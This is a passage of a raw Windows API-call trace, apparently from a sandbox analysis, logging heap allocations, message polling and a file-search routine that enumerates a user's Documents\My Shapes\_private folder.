dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e008 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.019] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e080 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e080 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4e0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.020] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.021] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="_private", cAlternateFileName="")) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e080 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.021] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.021] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.021] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.021] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.021] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4f8 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4f8 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.021] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d20 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d10 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b570 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b5d0 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b5d0 | out: hHeap=0x650000) returned 1 [0074.022] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b6a8 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690db0 | out: hHeap=0x650000) returned 1 [0074.022] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690da0 | out: hHeap=0x650000) returned 1 [0074.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8bb8 [0074.061] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.061] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x4, dwReserved1=0x657690, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b6a8 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dc0 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b690 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e260 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.061] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dd0 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dc0 | out: hHeap=0x650000) returned 1 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.061] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.061] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.061] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dc0 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e260 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b690 | out: hHeap=0x650000) returned 1 [0074.062] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x697d10 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dd0 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.062] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x697d10 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dd0 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.062] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x697da8 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690df0 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b6c0 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690e00 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dd0 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x697d10 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690de0 | out: hHeap=0x650000) returned 1 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b690 | out: hHeap=0x650000) returned 1 [0074.062] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8c38 | out: hHeap=0x650000) returned 1 [0074.062] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690de0 | out: hHeap=0x650000) returned 1 [0074.062] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.062] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.063] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x14e0057, ftCreationTime.dwLowDateTime=0xc2b9f, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1460058, nFileSizeHigh=0xc2b9f, nFileSizeLow=0x698c00, dwReserved0=0x10, dwReserved1=0x657690, cFileName="鞠麿\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b690 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e260 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690de0 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b6c0 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x650000) returned 1 [0074.063] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x697d10 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690de0 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bf8 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b678 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b6c0 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e260 | out: hHeap=0x650000) returned 1 [0074.063] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d90 | out: hHeap=0x650000) returned 1 [0074.063] FindClose (in: hFindFile=0x6b8bb8 | out: hFindFile=0x6b8bb8) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b6a8 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690dc0 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e288 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b6c0 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e260 | out: hHeap=0x650000) returned 1 [0074.063] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b738 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e170 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d40 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e148 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b5e8 | out: hHeap=0x650000) returned 1 [0074.063] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b5d0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d60 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e1e8 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b5b8 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d30 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e120 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e1c0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d50 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e198 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b5a0 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b588 | out: hHeap=0x650000) returned 1 [0074.064] HeapFree (in: hHeap=0x650000, 